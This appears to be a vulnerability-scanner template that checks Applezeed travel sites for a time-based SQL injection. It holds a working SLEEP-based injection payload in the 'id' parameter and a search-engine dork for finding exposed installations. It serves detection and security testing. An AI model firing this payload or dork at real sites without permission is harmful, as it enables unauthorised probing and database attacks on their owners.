id: applezeed-sqli

info:
  name: Applezeed - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    Applezeed's 'travel-details.php?id=' URL with possible time-based SQL injection (SQLi) vulnerability allows attackers to manipulate the 'id' parameter, potentially causing delays in SQL queries and unauthorized retrieval of travel information from the database
  reference:
    - https://cxsecurity.com/issue/WLB-2019120057
  metadata:
    verified: true
    max-request: 1
    google-query: intext:"Power BY applezeed.com"
  tags: Applezeed

http:
  - raw:
      - |
        @timeout: 15s
        GET /travel-detail.php?id=1%27AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(6)))bAKL)%20AND%20%27vRxe%27=%27vRxe HTTP/2
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "applezeed")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a004730450221009d63fed3fad480aa6ffa5900cab2051b488b244cb686187965a5b6f747597cdb02204d0fe5d44b2045dbbbb5cd8c28a17704dbbdf28732f9faf67d9b4ca57784ee3c:922c64590222798bb761d5b6d8e72950